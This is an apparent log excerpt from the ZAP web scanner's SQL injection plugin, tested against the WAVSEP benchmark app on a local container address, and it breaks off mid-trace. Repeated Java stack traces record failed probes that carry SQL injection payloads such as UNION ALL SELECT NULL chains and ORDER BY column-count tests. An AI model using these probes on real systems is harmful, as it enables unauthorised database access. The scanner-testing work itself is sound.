Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962963 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962965 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962967 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8962968 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp ORDER BY 8134-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp ORDER BY 8134-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8962970 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962972 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962974 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962976 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962977 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962978 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962980 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962981 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at 